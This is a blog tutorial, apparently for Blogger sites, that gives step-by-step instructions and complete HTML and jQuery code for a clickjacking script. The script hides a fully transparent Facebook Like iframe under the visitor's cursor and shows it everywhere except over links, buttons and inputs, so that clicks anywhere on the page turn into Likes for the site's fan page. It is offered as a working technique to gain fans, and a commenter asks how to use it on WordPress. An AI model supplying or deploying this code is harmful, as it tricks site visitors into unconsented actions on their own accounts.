Automatically Increase Facebook Likes with Webpage Script



Facebook has already been the No 1. Social media to get more fans and more fans means more exposure. If you get more likes for your fan page it means you are popular. More unique visitors get attracted and get more traffic to your unique content. There are already many means of getting more Facebook fans the one I am sharing, help you to increase Facebook likes to your fan page. Follow given below steps and get tons of fans. 


With the help of this simple script every unique visitor can become your fan or increase your like. If visitor will click anywhere on the webpage then they will automatically increase your Facebook fans. Let’s start the tutorial:

How to automatically increase Facebook like with Webpage Script in Blogger?

STEP #1: Log on to Blogger.

STEP #2: Go to Dashboard > Template

STEP #3: Click on Edit HTML>Proceed

STEP #4: Now just press Ctrl + F to search for </head> tag

STEP #5: Paste the below script above it


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript"> </script> <script type='text/javascript'>          function ClickJackFbHide(){            jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).hide();         }         function ClickJackFbShow(){            jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).show();         }     </script>


STEP #6: Now again search for </body> tag

STEP #7: Paste the below script above it


<div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)';  margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden"> <!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe src="http://www.facebook.com/plugins/like.php?href=Fanpage URL Link&amp;layout=button_count&amp;show_faces=false&amp;width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe> 
   </div>     <script type="text/javascript">        jQuery( document ).ready( function() {           $( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {             jQuery( "#clickjack-button-wrapper-5" ).css( {                top: e.pageY - 10,                left: e.pageX + 30             } );          } );                         clickjack_hider();                         var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);       } );                         function clickjack_hider(){          jQuery("input").mouseout(function(){ClickJackFbShow();});          jQuery("a").mouseout(function(){ClickJackFbShow();});          jQuery("button").mouseout(function(){ClickJackFbShow();});          jQuery("textarea").mouseout(function(){ClickJackFbShow();});          jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();});         jQuery("object").mouseout(function(){ClickJackFbShow();});          jQuery("input").mouseover(function(){ClickJackFbHide();});          jQuery("a").mouseover(function(){ClickJackFbHide();});          jQuery("button").mouseover(function(){ClickJackFbHide();});          jQuery("textarea").mouseover(function(){ClickJackFbHide();});          jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();});         jQuery("object").mouseover(function(){ClickJackFbHide();});                         }    </script>


STEP #8: Now just replace the GREEN highlighted in above script with your facebook page URL.

STEP #9: Now just Save the template.

So execute steps correctly and you are done. Head to your blog/website and check the trick executed. As you refresh your blog you will see that your cursor has been changed replacing with a hand one and a hidden link moving with it. Now your readers/visitors as they click any where on the page becomes your fan instantly.

Limitations:
Some issues you might face using this script in your website or blog:
  • People might not able to select the text using drag.
  • Some other gadgets on the blog might get affected.
  • When someone who is not logged into Facebook comes to your blog/website and clicks somewhere, this opens a pop up prompting to log into Facebook.

Try using it if everything works OK than start increasing your Facebook likes.

So don't forget us. We will only survive with your generosity. Like, Share, Follow and Subscribe. If you are facing any problem with implementing these codes just comment below for help. Stay tuned for more posts.



{ 1 comments... read them below or add one }

Lalit Sharma said...

how to add this script on wordpress blog? I want to add it on elkeesmedia.com tech blog

Post a Comment